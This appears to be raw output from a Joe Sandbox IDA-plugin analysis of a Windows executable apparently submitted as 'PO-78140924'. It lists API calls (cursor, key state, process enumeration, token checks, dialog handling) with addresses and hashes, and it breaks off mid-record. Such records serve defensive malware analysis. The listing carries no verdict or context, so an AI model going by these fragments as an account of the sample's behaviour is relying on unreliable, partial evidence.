                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                • String ID:
                                                • API String ID: 1300846289-0
                                                • Opcode ID: 3d51c26fe226f373779e72ff5b934103ccd11399673f371aa427e26b4b7b64fb
                                                • Instruction ID: c3e0aa98c22c81e3d107b91aae04b69733cc0892c019ab93c401b518328000fe
                                                • Opcode Fuzzy Hash: 3d51c26fe226f373779e72ff5b934103ccd11399673f371aa427e26b4b7b64fb
                                                • Instruction Fuzzy Hash: ED02B270E00219DFDF14DF64D991AAE7BF5EF44300F1480A9E80AEB256EB31DA51CB95
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: pb
                                                • API String ID: 0-2194326746
                                                • Opcode ID: 09f36c930b94712d70be7e3d4370996cf265cb668d34b3eab79935aac3d1cae7
                                                • Instruction ID: b7510e8a66d6b88d0acc219f84fa22e154f366aced696f204e6d2cc589be335a
                                                • Opcode Fuzzy Hash: 09f36c930b94712d70be7e3d4370996cf265cb668d34b3eab79935aac3d1cae7
                                                • Instruction Fuzzy Hash: 2D926A70A083518FD760DF14D490BABBBE5BF84304F14896DE88A8B352D775EC89CB92
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,?), ref: 000119FA
                                                  • Part of subcall function 00011290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 000112D8
                                                • GetSysColor.USER32(0000000F), ref: 00011A4E
                                                • SetBkColor.GDI32(?,00000000), ref: 00011A61
                                                Similarity
                                                • API ID: ColorDialogNtdllProc_
                                                • String ID:
                                                • API String ID: 2596215360-0
                                                • Opcode ID: b128ede724ded75a98d7675508b93c984aa460099cd19c8b886e9302d3c23288
                                                • Instruction ID: 59242f2560e06d2e20ae39d63581e24469c356f271aed2d9ad0199b221a02157
                                                • Opcode Fuzzy Hash: b128ede724ded75a98d7675508b93c984aa460099cd19c8b886e9302d3c23288
                                                • Instruction Fuzzy Hash: C77124B111A884B9FA7C66284C49DFF2C8DDF4A382B95012AF302D1087CF15DD81A2FB
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00012357
                                                • ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                • GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                • GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: bb6cc5a127e4d9a1bfb7846be37a76ccf2bb104d6d7b348f88faffdc6e316522
                                                • Instruction ID: 9565fffbbaa371b8593d18a7a452c4ddae1e9ea508cf493d33fbadfdf59d7538
                                                • Opcode Fuzzy Hash: bb6cc5a127e4d9a1bfb7846be37a76ccf2bb104d6d7b348f88faffdc6e316522
                                                • Instruction Fuzzy Hash: 8C418175904109FBDF559F64C844EEDBBB4FB05360F10432AF834922A1C7356AA0DBA0
                                                Similarity
                                                • API ID: __itow
                                                • String ID:
                                                • API String ID: 3482036329-0
                                                • Opcode ID: f83e6c536b4461e6baefe7c2d31476bd3ec22e4af3e5d421c957e743c564593c
                                                • Instruction ID: b7de3e9d81200614feb79def9542655ef00a19cb291a08c69b7074245bed4603
                                                • Opcode Fuzzy Hash: f83e6c536b4461e6baefe7c2d31476bd3ec22e4af3e5d421c957e743c564593c
                                                • Instruction Fuzzy Hash: 2822AD716083119FC724DF24D891BAFB7E5AF84314F10492DF89A97292DB35EE48CB92
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00073CBE
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00073CCC
                                                • Process32NextW.KERNEL32(00000000,?), ref: 00073CEC
                                                • CloseHandle.KERNEL32(00000000), ref: 00073D96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 3536bd42316b62764b9157e2516ae636617699431fb88069f45dd5f4b37f64b5
                                                • Instruction ID: 16c6fa4fbd843589fc4e3579b9b4d06c0513e4a9ebe5b02b18c57393eedc395b
                                                • Opcode Fuzzy Hash: 3536bd42316b62764b9157e2516ae636617699431fb88069f45dd5f4b37f64b5
                                                • Instruction Fuzzy Hash: E831A0715083019FE310EF20D885AEFBBF8FF95344F54492DF485861A2EB749A89CB92
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • GetCursorPos.USER32(?), ref: 0009C53C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,?,?,?,?,0004BB2B), ref: 0009C551
                                                • GetCursorPos.USER32(?), ref: 0009C59E
                                                • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0004BB2B), ref: 0009C5D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                • String ID:
                                                • API String ID: 1423138444-0
                                                • Opcode ID: 50f38066fe56b27de5d77cfbfd14eb7658cd1320cdb88fe3479d4e7e0130d6ea
                                                • Instruction ID: f30083377f252e434086d01aa2dd57c6e9dcab8b5dd8308ea1441b2791bfa11e
                                                • Opcode Fuzzy Hash: 50f38066fe56b27de5d77cfbfd14eb7658cd1320cdb88fe3479d4e7e0130d6ea
                                                • Instruction Fuzzy Hash: 5631E335A00918AFEF118F54C848EEA7BF5FB49311F414066F9458B261C735AD90EBA0
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 000112D8
                                                • GetClientRect.USER32(?,?), ref: 0004B77B
                                                • GetCursorPos.USER32(?), ref: 0004B785
                                                • ScreenToClient.USER32(?,?), ref: 0004B790
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                • String ID:
                                                • API String ID: 1010295502-0
                                                • Opcode ID: a9503dbe4d7e6c6d234e24a4e888295c5f35767f944b53634f1ee8872d014c5e
                                                • Instruction ID: fa64cd5e8fb7501d496a8addbb701db49a5f03b30de37dbdef5d888e31b3a1c2
                                                • Opcode Fuzzy Hash: a9503dbe4d7e6c6d234e24a4e888295c5f35767f944b53634f1ee8872d014c5e
                                                • Instruction Fuzzy Hash: BD118C3560051AEFDF14EFA4D8859FE77B8FB06301F100456FA01E3241C734BAA18BA5
                                                APIs
                                                  • Part of subcall function 0004B494: _memset.LIBCMT ref: 0004B4A1
                                                  • Part of subcall function 00030AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(000D4158,00000000,000D4144,0004B470,?,?,?,0001100A), ref: 00030AC5
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0001100A), ref: 0004B474
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0001100A), ref: 0004B483
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0004B47E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: 2fabd05d6c65b794baa3a7d69d6f303ee7828c46ed47320de132d59d3204cd35
                                                • Instruction ID: 110c741f11595e158b1f492fd1981073ce90583b66ffc96b357fa481a47b9adb
                                                • Opcode Fuzzy Hash: 2fabd05d6c65b794baa3a7d69d6f303ee7828c46ed47320de132d59d3204cd35
                                                • Instruction Fuzzy Hash: 76E06DB42007018BE321DF39E8047967BE4AB04345F01893DE892C6252E7B8D444CBA1
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00074A31
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00074A48
                                                • FreeSid.ADVAPI32(?), ref: 00074A58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 544e4afaaea0802896c40654eda74b2803f640cd1979e647f595e7a6b1a827b5
                                                • Instruction ID: 8f1009d5ee98c421b64ab52da9232d7114e0995f113dd8c9d2bcc5a22f9d1fac
                                                • Opcode Fuzzy Hash: 544e4afaaea0802896c40654eda74b2803f640cd1979e647f595e7a6b1a827b5
                                                • Instruction Fuzzy Hash: 30F03775A51209BFEB00DFE09C89ABEBBBCFB08201F1044A9A901E2181E6746A148B50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4804783161d7e7e7aab504a4f8fe91b78e5075bfdc4e4bafcb874f8bfa4f9be7
                                                • Instruction ID: 66021439df1f7ba7abe214b1809e2be62077a3774caf790e727b7931e7d026de
                                                • Opcode Fuzzy Hash: 4804783161d7e7e7aab504a4f8fe91b78e5075bfdc4e4bafcb874f8bfa4f9be7
                                                • Instruction Fuzzy Hash: EC229A74A002569FDB24DF58C494AEEF7F1FF08310F148169EC56AB382E374AA85CB91
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • GetParent.USER32(?), ref: 0004B93A
                                                • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 0004B9B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LongWindow$DialogNtdllParentProc_
                                                • String ID:
                                                • API String ID: 314495775-0
                                                • Opcode ID: 7f6a8042f39043594f2228b996fb3102a3922509565f02fef34c32bd6b9990ff
                                                • Instruction ID: 75e2cc6acc74deeeb13f01b9266e1d8fb2bbd7b4ac7ef59bff253683bcbbce7c
                                                • Opcode Fuzzy Hash: 7f6a8042f39043594f2228b996fb3102a3922509565f02fef34c32bd6b9990ff
                                                • Instruction Fuzzy Hash: 6321B434209514AFDB648F28DC84EE93BE6AF0A320F544265FB255B3F2CB319D91EB50
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0004BABA), ref: 0009C65B
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0009C641
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                • String ID:
                                                • API String ID: 1273190321-0
                                                • Opcode ID: 190a61c75b82148b0e34305c8dbf6106b912e3461231bb1fc0b85407c0cd454d
                                                • Instruction ID: 2a398f2a4b2ccda1ea76a287cbc453fc7674aa3b9d5720ae84b75efe5ec576ee
                                                • Opcode Fuzzy Hash: 190a61c75b82148b0e34305c8dbf6106b912e3461231bb1fc0b85407c0cd454d
                                                • Instruction Fuzzy Hash: D601D431201614ABEF215F14DC84FAA3BA6FB89721F140129FD011B2E1CB31AC62EBA0
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 0009C9CB
                                                • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0004BB96), ref: 0009C9F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ClientDialogNtdllProc_Screen
                                                • String ID:
                                                • API String ID: 3420055661-0
                                                • Opcode ID: 57890c0fb065f0ea6901dc243711e54afa9d4dae8eb91d6a33515291c5f6519d
                                                • Instruction ID: 558d29647cb896b1f80386e5e154dae5cb96bfa3fa1d42d4d0884c4136f27030
                                                • Opcode Fuzzy Hash: 57890c0fb065f0ea6901dc243711e54afa9d4dae8eb91d6a33515291c5f6519d
                                                • Instruction Fuzzy Hash: 66F01772400218FFEF048F85DC09ABE7BB9FB48311F10416BF901A2161D775AA60EBA0
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,0008957D,?,0009FB84,?), ref: 0007A121
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,0008957D,?,0009FB84,?), ref: 0007A133
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: f38ad73181e36ccc3e086d799f841fe7714d0bcae0e3e8a50a2b19f634f550d5
                                                • Instruction ID: 0150820e645ca514c278f74478e29612b7fe5335dfc63aadaa26279de91d905a
                                                • Opcode Fuzzy Hash: f38ad73181e36ccc3e086d799f841fe7714d0bcae0e3e8a50a2b19f634f550d5
                                                • Instruction Fuzzy Hash: 91F0823560522DBBEB209FA4CC48FEE776CFF09361F008166B909D6191D6349940CBA1
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0009CAEE
                                                • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0004BB15), ref: 0009CB1C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 6f17092cdbfdcae5584a1e43265d3f9440234dd6d7dd619d637cd87d62c236f5
                                                • Instruction ID: 9b3debc04c07b53fcf7ae5ce2e6cdd117025678658c121839a132c9e4820f4d4
                                                • Opcode Fuzzy Hash: 6f17092cdbfdcae5584a1e43265d3f9440234dd6d7dd619d637cd87d62c236f5
                                                • Instruction Fuzzy Hash: 0DE04F70100215BBFB149F19DC1AFBA3B54F704750F508116F996D90E1C7749850E660
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00038ED7,?,?,?,00000000), ref: 0003A2DA
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0003A2E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 3fdf307a33189231eb26fdd59bed1c6b758cb9412652bc16f047e60e88381b3e
                                                • Instruction ID: 75b3e4001b922e5c1607e4acdb52673a91a7856ee1554f7384c21f679460f11b
                                                • Opcode Fuzzy Hash: 3fdf307a33189231eb26fdd59bed1c6b758cb9412652bc16f047e60e88381b3e
                                                • Instruction Fuzzy Hash: 46B09B31054209E7D6001B91EC097543F58F744752F408021F50DC4060C7E955904651
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73388281d72759e762e283892fe49496baf071407c931507c418bf34fe7dca66
                                                • Instruction ID: 7e13761a6c3bd68515bc477d43e21a4364fd0eb3cd3982a65fa8eda229aeb1c9
                                                • Opcode Fuzzy Hash: 73388281d72759e762e283892fe49496baf071407c931507c418bf34fe7dca66
                                                • Instruction Fuzzy Hash: 4A32F362D29F424DE7639634DC32336A28DAFB73D4F15D737E81AB59A6EB29C4834100
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: n
                                                • API String ID: 0-2013832146
                                                • Opcode ID: dacfd9ef750f3800961f2d37cfbfa15b1fe70ec7ea550bd5d969c53461cf75f3
                                                • Instruction ID: 4fa0e94a2831bb16fd7d90281f6962ded35f3fbcbb8d38d4da9fc7ac27dead6c
                                                • Opcode Fuzzy Hash: dacfd9ef750f3800961f2d37cfbfa15b1fe70ec7ea550bd5d969c53461cf75f3
                                                • Instruction Fuzzy Hash: D52248789026268BDF798B18EC9467CB7E2FF01306F68C06EE9469B991DF349D81C741
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5711d147cf57b8ec3fafe491d190e4d2120bfeaaba3a1421b35e68c3b6731cb9
                                                • Instruction ID: 9db0f08a8557bf658f59dfc7a9eca70f5e14686bb374cbe6826355f736e338e1
                                                • Opcode Fuzzy Hash: 5711d147cf57b8ec3fafe491d190e4d2120bfeaaba3a1421b35e68c3b6731cb9
                                                • Instruction Fuzzy Hash: 45B11221E2AF404DE76396398831336BB4CAFBB2C5F91D71BFC2674D62EB2585838141
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0009D8A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 674cc9bd4840df36b520dfe8b38fe5a54361493c1ec2ff1e9338b0d3e70aa3b7
                                                • Instruction ID: a9ac303399f1126234353bc0c32b5814f785ef1ed502cbd879a827f64197f3d6
                                                • Opcode Fuzzy Hash: 674cc9bd4840df36b520dfe8b38fe5a54361493c1ec2ff1e9338b0d3e70aa3b7
                                                • Instruction Fuzzy Hash: 66112774240215ABFF285E2CDD05FBE3764DB41720F604326F9215A1D3CE649D00B2A4
                                                APIs
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0004BAD2), ref: 0009D49C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 049646720497adf9a27ebf1e194542e9c16f0e7e87f5e7f23525ffc4f379a9c6
                                                • Instruction ID: 5c53db84a492b17d1b25d1ac583751b6869b22d3567b87d33b126b4652edcc3b
                                                • Opcode Fuzzy Hash: 049646720497adf9a27ebf1e194542e9c16f0e7e87f5e7f23525ffc4f379a9c6
                                                • Instruction Fuzzy Hash: AE01D475640118BBDF149F29D849AFA3BE2EF46361F084126F9595B2A2C731BC60F7A0
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 00012344: GetCursorPos.USER32(?), ref: 00012357
                                                  • Part of subcall function 00012344: ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0004BB7F,?,?,?,?,?,00000001), ref: 0009BFEC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                Similarity
